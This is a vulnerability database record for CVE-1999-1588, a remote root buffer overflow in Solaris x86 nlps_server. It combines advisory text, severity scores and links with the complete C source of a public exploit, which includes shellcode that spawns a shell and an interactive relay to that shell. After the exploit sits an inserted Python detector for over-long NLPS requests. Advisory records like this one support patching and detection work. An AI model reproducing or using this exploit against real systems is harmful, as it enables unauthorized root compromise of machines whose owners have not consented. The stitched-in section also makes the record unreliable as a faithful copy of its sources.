CVE-1999-1588
CVSS 10.0
Published: 1999-12-31 00:00:00
Revised: 2008-09-05 16:19:53

[Original] Buffer overflow in nlps_server in Sun Solaris x86 2.4, 2.5, and 2.5.1 allows remote attackers to execute arbitrary code as root via a long string beginning with "NLPS:002:002:" to the listen (aka System V listener) port, TCP port 2766.


[CNNVD] Solaris x86 nlps_server Remote Buffer Overflow Vulnerability (CNNVD-199912-121)

The x86 versions of Solaris 2.4, 2.5 and 2.5.1 ship an nlps_server that contains a buffer overflow vulnerability.
Once installed, nlps_server listens on port 2766; a remote attacker can exploit this buffer overflow to obtain root access.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sun:solaris:2.5.1::x86

- OVAL (technical details for detection)

No related OVAL definitions found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1588
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1588
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-121
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/data/vulnerabilities/exploits/nlps_server.c (MISC)
http://www.securityfocus.com/bid/2319 (BID 2319)
http://security-protocols.com/sploits/unsorted_exploits/nlps_server.c (MISC)
http://lsd-pl.net/files/get?SOLARIS/solx86_nlps_server (MISC)

- Vulnerability information

Solaris x86 nlps_server Remote Buffer Overflow Vulnerability
Severity: Critical; type: boundary condition error
Published 1999-12-31 00:00:00; updated 2006-05-01 00:00:00
Remote

- Advisories and patches

Vendor patches:
Sun
---
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://sunsolve.sun.com/security

- Vulnerability information (EDB 20602)

Solaris x86 2.4/2.5 nlps_server Buffer Overflow Vulnerability (EDBID:20602)
Platform: solaris, remote
1998-04-01, Verified
Author: Last Stage of Delirium
source: http://www.securityfocus.com/bid/2319/info

Solaris 2.4, 2.5, and 2.51 x86 are vulnerable to a buffer overflow in nlps_server, a process residing on port 2766 when installed. Attackers can exploit this buffer overflow to gain remote root access. 

/*## copyright LAST STAGE OF DELIRIUM apr 1998 poland        *://lsd-pl.net/ #*/
/*## listen/nlps_server                                                      #*/

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <fcntl.h>
#include <errno.h>

#define ADRNUM 256                 /* bytes of repeated return address     */
#define NOPNUM (64+46+7+4)         /* length of the NOP sled               */

char adr[4]="\x30\x79\x04\x08";    /* return address (little-endian)       */

char shellcode[]=
    "\xeb\x1b"             /* jmp     <shellcode+30>       */
    "\x33\xd2"             /* xorl    %edx,%edx            */
    "\x58"                 /* popl    %eax                 */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi       */
    "\x52"                 /* pushl   %edx                 */
    "\x57"                 /* pushl   %edi                 */
    "\x50"                 /* pushl   %eax                 */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x92"                 /* xchgl   %eax,%edx            */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)        */
    "\x83\xef\x3c"         /* subl    $0x3c,%edi           */
    "\xb0\x9a"             /* movb    $0x9a,%al            */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x47"                 /* incl    %edi                 */
    "\xb0\x07"             /* movb    $0x7,%al             */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\xb0\x3b"             /* movb    $0x3b,%al            */
    "\xe8\xe0\xff\xff\xff" /* call    <shellcode+2>        */
    "/bin/ksh"
;

int main(int argc,char **argv){
    char buffer[1024],*b;
    int sck,i;
    struct sockaddr_in address;
    struct hostent *hp;

    printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland  //lsd-pl.net/\n");
    printf("listen/nlps_server for solaris 2.4 2.5 2.5.1 x86\n\n");

    if(argc!=2){
        printf("usage: %s address\n",argv[0]);exit(1);
    }
    sck=socket(AF_INET,SOCK_STREAM,0);
    bzero(&address,sizeof(address));
    address.sin_family=AF_INET;
    address.sin_port=htons(2766);                /* listen (System V listener) port */
    if((address.sin_addr.s_addr=inet_addr(argv[1]))==INADDR_NONE){
        if((hp=gethostbyname(argv[1]))==NULL){
            printf("error: address.\n");exit(-1);
        }
        memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
    }
    if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
        perror("error");exit(-1);
    }

    /* build the request: NLPS header, repeated address, NOP sled, shellcode */
    memset(buffer,0,sizeof(buffer));
    sprintf(buffer,"NLPS:002:002:");
    b=&buffer[13];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    /* hex dump of the request as built */
    for(i=0;i<(14+ADRNUM+NOPNUM+strlen(shellcode)+1);i++)
        printf("%02x",(unsigned char)buffer[i]);
    fflush(stdout);

    /* the original sends 34 extra trailing bytes; they are zeroed above */
    write(sck,buffer,14+ADRNUM+NOPNUM+strlen(shellcode)+34+1);
    write(sck,"yahoo...\n",9);

    /* relay stdin to the socket and socket output to stdout */
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
    return 0;
}
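The CVE text above identifies the trigger as a long string following the "NLPS:002:002:" header on TCP port 2766. The following Python check is an added example (not part of this record or of the LSD code) that classifies a captured payload to that port as a short legitimate request or as an over-long or binary body worth alerting on; the header regex and the 128-byte threshold are assumptions, and the sample payloads are constructed.

```python
import re

# Header the vulnerable listener expects on TCP 2766; per the CVE text the
# overflow is triggered by a long string that follows it. The three-digit
# field format is an assumption based on the "NLPS:002:002:" string.
NLPS_HEADER = re.compile(rb"^NLPS:(\d{3}):(\d{3}):")

# Assumed threshold: a legitimate request body is a short service name,
# while the published exploit sends several hundred bytes after the header.
MAX_SAFE_BODY = 128


def inspect_nlps_request(payload: bytes, max_body: int = MAX_SAFE_BODY) -> dict:
    """Classify one TCP payload sent to the listen (System V listener) port.

    verdict values:
      "not-nlps" - payload does not start with an NLPS header
      "ok"       - well-formed header followed by a short printable body
      "overflow" - body longer than max_body, or body containing
                   non-printable bytes (addresses, NOP sled, shellcode)
    """
    m = NLPS_HEADER.match(payload)
    if not m:
        return {"verdict": "not-nlps", "body_len": len(payload)}
    body = payload[m.end():]
    text = body.rstrip(b"\r\n")
    binary = any(c < 0x20 or c > 0x7E for c in text)
    verdict = "overflow" if len(body) > max_body or binary else "ok"
    return {
        "verdict": verdict,
        "body_len": len(body),
        "versions": (m.group(1).decode(), m.group(2).decode()),
    }


# Constructed sample payloads (not captured traffic).
BENIGN = b"NLPS:002:002:lp\n"
OVERLONG = b"NLPS:002:002:" + b"A" * 300
BINARY = b"NLPS:002:002:" + b"\x90" * 16 + b"/bin/ksh"
NOT_NLPS = b"GET / HTTP/1.0\r\n"


def scan(payloads):
    """Return the payloads that should raise an alert."""
    return [p for p in payloads if inspect_nlps_request(p)["verdict"] == "overflow"]


if __name__ == "__main__":
    for p in (BENIGN, OVERLONG, BINARY, NOT_NLPS):
        print(inspect_nlps_request(p)["verdict"])
```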

- Vulnerability information

36583
Solaris nlps_server Listen Port (System V Listener) Remote Overflow
Remote / Network Access; Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

1998-04-01 Unknown
1998-04-01 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete